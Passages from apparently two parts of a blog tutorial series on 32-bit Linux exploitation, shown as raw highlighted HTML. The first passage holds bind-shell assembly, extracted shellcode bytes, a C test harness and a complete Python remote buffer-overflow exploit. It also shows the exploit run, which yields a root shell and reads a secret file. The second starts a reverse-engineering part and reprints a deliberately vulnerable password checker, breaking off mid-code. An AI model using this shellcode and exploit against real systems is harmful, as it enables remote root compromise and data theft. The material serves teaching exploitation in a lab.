/spanspan class="c1"; into ecx/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"int/spanspan class="w" /spanspan class="mh"0x80/spanspan class="w" /spanspan class="c1"; execute the syscall socketcall LISTEN/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"al/spanspan class="p",/spanspan class="w" /spanspan class="mh"0x66/spanspan class="w" /spanspan class="c1"; put the sys call number 102 into eax/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"bl/spanspan class="p",/spanspan class="w" /spanspan class="mh"0x5/spanspan class="w" /spanspan class="c1"; select ACCEPT to start accepting connections/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="nb"edx/spanspan class="w" /spanspan class="c1"; push arguments to accept onto the stack/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="nb"edx/spanspan class="w" /spanspan class="c1"; in reverse order we only need the destriptor/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="nb"esi/spanspan class="w" /spanspan class="c1"; here/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"ecx/spanspan class="p",/spanspan class="w" /spanspan class="nb"esp/spanspan class="w" /spanspan class="c1"; move the address of the arguments/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; into ecx/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"int/spanspan class="w" /spanspan class="mh"0x80/spanspan class="w" /spanspan class="c1"; execute the syscall socketcall ACCEPT/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"ebx/spanspan class="p",/spanspan class="w" /spanspan class="nb"eax/spanspan class="w" /spanspan class="c1"; move the descriptor returned by accept/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; into ebx to be the first argument to/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; dup2/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"xor/spanspan class="w" /spanspan class="nb"ecx/spanspan class="p",/spanspan class="w" /spanspan class="nb"ecx/spanspan class="w" /spanspan class="c1"; zero out ecx/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"cl/spanspan class="p",/spanspan class="w" /spanspan class="mh"0x3/spanspan class="w" /spanspan class="c1"; get the ecx register ready to decrement/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="nl"dupfd:/spanspan class="w" /spanspan class="c1"; the label for our loop through stdin, stdout and stderr/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"dec/spanspan class="w" /spanspan class="nb"cl/spanspan class="w" /spanspan class="c1"; decrement ecx so we include 2, 1 and 0/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"al/spanspan class="p",/spanspan class="w" /spanspan class="mh"0x3f/spanspan class="w" /spanspan class="c1"; put the sys call number 63 into eax/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"int/spanspan class="w" /spanspan class="mh"0x80/spanspan class="w" /spanspan class="c1"; execute the syscall dup2/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"jne/spanspan class="w" /spanspan class="nv"dupfd/spanspan class="w" /spanspan class="c1"; create the loop/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"xor/spanspan class="w" /spanspan class="nb"eax/spanspan class="p",/spanspan class="w" /spanspan class="nb"eax/spanspan class="w" /spanspan class="c1"; zero out eax/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="nb"edx/spanspan class="w" /spanspan class="c1"; null terminate the string/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="mh"0x68736162/spanspan class="w" /spanspan class="c1"; push the string ////bin/bash/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="mh"0x2f6e6962/spanspan class="w" /spanspan class="c1"; in reverse/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="mh"0x2f2f2f2f/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"ebx/spanspan class="p",/spanspan class="w" /spanspan class="nb"esp/spanspan class="w" /spanspan class="c1"; move the address of the string into ebx/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="nb"edx/spanspan class="w" /spanspan class="c1"; push the second argument to execve onto the/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="nb"ebx/spanspan class="w" /spanspan class="c1"; stack in reverse order/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"ecx/spanspan class="p",/spanspan class="w" /spanspan class="nb"esp/spanspan class="w" /spanspan class="c1"; move the address of the 2nd argument/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; into ecx/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="nb"edx/spanspan class="w" /spanspan class="c1"; the thrid argument to execve/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"edx/spanspan class="p",/spanspan class="w" /spanspan class="nb"esp/spanspan class="w" /spanspan class="c1"; a null pointer/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"al/spanspan class="p",/spanspan class="w" /spanspan class="mh"0xb/spanspan class="w" /spanspan class="c1"; put the sys call number 11 into eax/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"int/spanspan class="w" /spanspan class="mh"0x80/spanspan class="w" /spanspan class="c1"; execute the syscall execve/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pNow to assemble, link and test the shellcode:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spannasm -f elf32 -o bindshell.o bindshell.nasm/span span class="code-line"span class="gp"testuser@dev:~$ /spanld -o bindshell bindshell.o/span span class="code-line"span class="gp"testuser@dev:~$ /spanobjdump -d ./bindshellspan class="p"|/spangrep span class="s1"#39;[0-9a-f]:#39;/spanspan class="p"|/spangrep -v span class="s1"#39;file#39;/spanspan class="p"|/spancut -f2 -d:span class="p"|/spancut -f1-6 -dspan class="s1"#39; #39;/spanspan class="p"|/spantr -s span class="s1"#39; #39;/spanspan class="p"|/spantr span class="s1"#39;\t#39;/span span class="s1"#39; #39;/spanspan class="p"|/spansed span class="s1"#39;s/ $//g#39;/spanspan class="p"|/spansed span class="s1"#39;s/ /\\x/g#39;/spanspan class="p"|/spanpaste -d span class="s1"#39;#39;/span -s span class="p"|/spansed span class="s1"#39;s/^/quot;/#39;/spanspan class="p"|/spansed span class="s1"#39;s/$/quot;/g#39;/span/span span class="code-line"span class="go"quot;\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x17\x31\xdb\xcd\x80\x89\xd8\xb0\x66\xb3\x01\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52\x66\x68\x27\x0e\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80quot;/span/span span class="code-line"span class="gp"testuser@dev:~$ /spancat shellcode.c/span span class="code-line"span class="gp"#/spanincludelt;stdio.hgt;/span span class="code-line"span class="gp"#/spanincludelt;string.hgt;/span span class="code-line"/span span class="code-line"span class="go"unsigned char code[] = \/span/span span class="code-line"span class="go"quot;\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x17\x31\xdb\xcd\x80\x89\xd8\xb0\x66\xb3\x01\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52\x66\x68\x27\x0e\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80quot;;/span/span span class="code-line"/span span class="code-line"span class="go"main()/span/span span class="code-line"span class="go"{/span/span span class="code-line"/span span class="code-line"span class="go" printf(quot;Shellcode Length: %d\nquot;, strlen(code));/span/span span class="code-line"/span span class="code-line"span class="go" int (*ret)() = (int(*)())code;/span/span span class="code-line"/span span class="code-line"span class="go" ret();/span/span span class="code-line"/span span class="code-line"span class="go"}/span/span span class="code-line"span class="gp"testuser@dev:~$ /spangcc -z execstack -fno-stack-protector -o shellcode shellcode.c/span span class="code-line"span class="gp"testuser@dev:~$ /span./shellcode/span span class="code-line"span class="go"Shellcode Length: 119/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@dev:~$ /spannc span class="m"127/span.0.0.1 span class="m"9998/span/span span class="code-line"span class="go"whoami/span/span span class="code-line"span class="go"testuser/span/span span class="code-line"/code/pre/div /td/tr/table pSo our shellcode works, lastly we need to figure out where our shellcode will land, one thing you will need to know is that when you start an application using codegdb/code, the memory layout of the stack is slightly different to when its started on its own (we saw this in part 2 where we kept having to adjust our attack inside and outside of codegdb/code)./p pOur shellcode is going to be stored on the stack so we need to start the application outside of codegdb/code and attach to it in another root terminal so we get the right position that our shellcode will be at:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /span./app-net /span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~# /spanps ax span class="p"|/span grep app-net/span span class="code-line"span class="go"19269 pts/0 S+ 0:00 ./app-net/span/span span class="code-line"span class="go"22791 pts/1 S+ 0:00 grep app-net/span/span span class="code-line"span class="gp"root@dev:~# /spangdb -q -p span class="m"19269/span/span span class="code-line"span class="go"Attaching to process 19269/span/span span class="code-line"span class="go"Reading symbols from /home/appuser/app-net...(no debugging symbols found)...done./span/span span class="code-line"span class="go"Reading symbols from /lib/i386-linux-gnu/i686/cmov/libc.so.6...(no debugging symbols found)...done./span/span span class="code-line"span class="go"Loaded symbols for /lib/i386-linux-gnu/i686/cmov/libc.so.6/span/span span class="code-line"span class="go"Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done./span/span span class="code-line"span class="go"Loaded symbols for /lib/ld-linux.so.2/span/span span class="code-line"span class="go"0xb7fe1424 in __kernel_vsyscall ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"c/span/span span class="code-line"span class="go"Continuing./span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanpython -c span class="s1"#39;print quot;Aquot;*532#39;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x41414141 in ?? ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/20xw $esp/span/span span class="code-line"span class="go"0xbffff390: 0xbfff000a 0xbffff3b4 0x000003e8 0x00000000/span/span span class="code-line"span class="go"0xbffff3a0: 0xbffff7a0 0xbffff79c 0x000057a8 0x00000006/span/span span class="code-line"span class="go"0xbffff3b0: 0x00001000 0x41414141 0x41414141 0x41414141/span/span span class="code-line"span class="go"0xbffff3c0: 0x41414141 0x41414141 0x41414141 0x41414141/span/span span class="code-line"span class="go"0xbffff3d0: 0x41414141 0x41414141 0x41414141 0x41414141/span/span span class="code-line"/code/pre/div /td/tr/table pSo our shellcode will start at code0xbffff3b4/code (its the second column on the row starting code0xbffff3b0/code, each column is 4 bytes long so code0xbffff3b0/code + 4 = code0xbffff3b4/code), this is the address that we need to overwrite EIP with./p pNow we have the length of our shellcode (119), the address we start overwriting on the stack and the number of bytes until we overwrite EIP, we can write our exploit:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="ch"#!/usr/bin/env python/span/span span class="code-line"/span span class="code-line"span class="kn"import/span span class="nn"socket/span/span span class="code-line"/span span class="code-line"span class="n"shellcode/span span class="o"=/span span class="s2"quot;/spanspan class="se"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x17\x31\xdb\xcd\x80\x89\xd8\xb0\x66\xb3\x01\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52\x66\x68\x27\x0e\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80/spanspan class="s2"quot;/span/span span class="code-line"/span span class="code-line"span class="n"payload/span span class="o"=/span span class="s2"quot;/spanspan class="se"\x90/spanspan class="s2"quot;/span span class="o"*/span span class="mi"402/span span class="c1"# (528 - 119) - 7 = 402/span/span span class="code-line"/span span class="code-line"span class="n"payload/span span class="o"+=/span span class="n"shellcode/span span class="c1"# append our shellcode/span/span span class="code-line"/span span class="code-line"span class="n"payload/span span class="o"+=/span span class="s2"quot;/spanspan class="se"\x90/spanspan class="s2"quot;/span span class="o"*/span span class="mi"7/span span class="c1"# another 7 bytes/span/span span class="code-line"/span span class="code-line"span class="n"payload/span span class="o"+=/span span class="s2"quot;/spanspan class="se"\xb4\xf3\xff\xbf/spanspan class="s2"quot;/span span class="c1"# the address of our shellcode/span/span span class="code-line" span class="c1"# in reverse (little endian)/span/span span class="code-line"/span span class="code-line"span class="c1"# create the tcp socket/span/span span class="code-line"span class="n"s/span span class="o"=/span span class="n"socket/spanspan class="o"./spanspan class="n"socket/spanspan class="p"(/spanspan class="n"socket/spanspan class="o"./spanspan class="n"AF_INET/spanspan class="p",/span span class="n"socket/spanspan class="o"./spanspan class="n"SOCK_STREAM/spanspan class="p")/span/span span class="code-line"/span span class="code-line"span class="c1"# connect to 127.0.0.1 port 9999/span/span span class="code-line"span class="n"s/spanspan class="o"./spanspan class="n"connect/spanspan class="p"((/spanspan class="s2"quot;127.0.0.1quot;/spanspan class="p",/span span class="mi"9999/spanspan class="p"))/span/span span class="code-line"/span span class="code-line"span class="c1"# send our payload/span/span span class="code-line"span class="n"s/spanspan class="o"./spanspan class="n"send/spanspan class="p"(/spanspan class="n"payload/spanspan class="p")/span/span span class="code-line"/span span class="code-line"span class="c1"# close the socket/span/span span class="code-line"span class="n"s/spanspan class="o"./spanspan class="n"close/spanspan class="p"()/span/span span class="code-line"/code/pre/div /td/tr/table h2Exploiting The App/h2 pFinally we can test the exploit against our application:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /span./app-net /span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanpython app-net-exploit.py/span span class="code-line"span class="gp"testuser@dev:~$ /spannc span class="m"127/span.0.0.1 span class="m"9998/span/span span class="code-line"span class="go"ls/span/span span class="code-line"span class="go"app-net/span/span span class="code-line"span class="go"secret.txt/span/span span class="code-line"span class="go"whoami/span/span span class="code-line"span class="go"root/span/span span class="code-line"span class="go"cat secret.txt/span/span span class="code-line"span class="go"This is a top secret file!/span/span span class="code-line"span class="go"Only people with the password should be able to view this file!/span/span span class="code-line"/code/pre/div /td/tr/table pPWNED!!! :-D/p h2Conclusion/h2 pI hope this has highlighted the differences between attacking local and remote applications. Different situations will always arise where you need to tweak the method you use to attack the application its best to be able to adapt to as many situations as possible./p pIt is a little more difficult to develop exploits for a remote applications and might not work when run against the actual target because of differences between the development environment and the actual target environment which is why its very important to try to replicate the target environment as much as possible./p pHappy Hacking :–)/p

pBefore I go into some of the protections that are commonly in place, I thought it would be best to show how to detect these 2 basic vulnerabilities using a href="https://en.wikipedia.org/wiki/Reverse_engineering" target="_blank"reverse engineering/a (as opposed to randomly a href="https://en.wikipedia.org/wiki/Fuzz_testing" target="_blank"fuzzing/a inputs as we did in parts a href="/x86-32-linux/2014/05/08/plain-buffer-overflow/"1/a, a href="/x86-32-linux/2014/05/20/plain-format-string-vulnerability/"2/a and a href="/x86-32-linux/2014/06/12/remote-exploitation/"3/a)./p pReverse engineering (reversing) is an extremely powerful tool in the hackers arsenal and when there is no source code for the application that you are targeting nothing is better./p !-- more -- pa href="https://en.wikipedia.org/wiki/Assembly_language" target="_blank"Assembly/a is the language of reversing and a a href="https://en.wikipedia.org/wiki/Debugger" target="_blank"debugger/a is the most important tool./p pAssembly is essentially the language of the processor, the actual "machine code" that people think of what the computer deals with (whether viewed as binary or hex) is just a different representation of assembly language, so this is the lowest level programming language possible to those outside of processor firmware development./p pA debugger is an application that allows you to view an applications a href="https://en.wikipedia.org/wiki/Virtual_memory" target="_blank"virtual memory segment/a as the application itself views it, as well as change the values in sections of memory or a href="https://en.wikipedia.org/wiki/Processor_register" target="_blank"CPU registers/a at run time./p pAnother important feature of a debugger is the ability to set a href="https://en.wikipedia.org/wiki/Breakpoint" target="_blank"breakpoints/a so you can force the application to stop execution at a specific part of the application and view values or a href="https://en.wikipedia.org/wiki/Stepping_%28debugging%29" target="_blank"step through/a the application instruction by instruction./p h2The App/h2 pWe will use the same basic application we used in parts a href="/x86-32-linux/2014/05/08/plain-buffer-overflow/"1/a and a href="/x86-32-linux/2014/05/20/plain-format-string-vulnerability/"2/a:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="cp"#define PASS quot;topsecretpasswordquot;/span/span span class="code-line"/span span class="code-line"span class="cp"#define SFILE quot;secret.txtquot;/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"p/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"printfile/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"main/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"argc/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"**/spanspan class="n"argv/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"argc/spanspan class="w" /spanspan class="o"lt;/spanspan class="w" /spanspan class="mi"2/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Usage: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot; lt;passwordgt;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"checkpass/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"r/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Wrong password: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printfile/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"a/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[/spanspan class="mi"512/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strncpy/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"a/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"a/spanspan class="p")/spanspan class="o"+/spanspan class="mi"1/spanspan 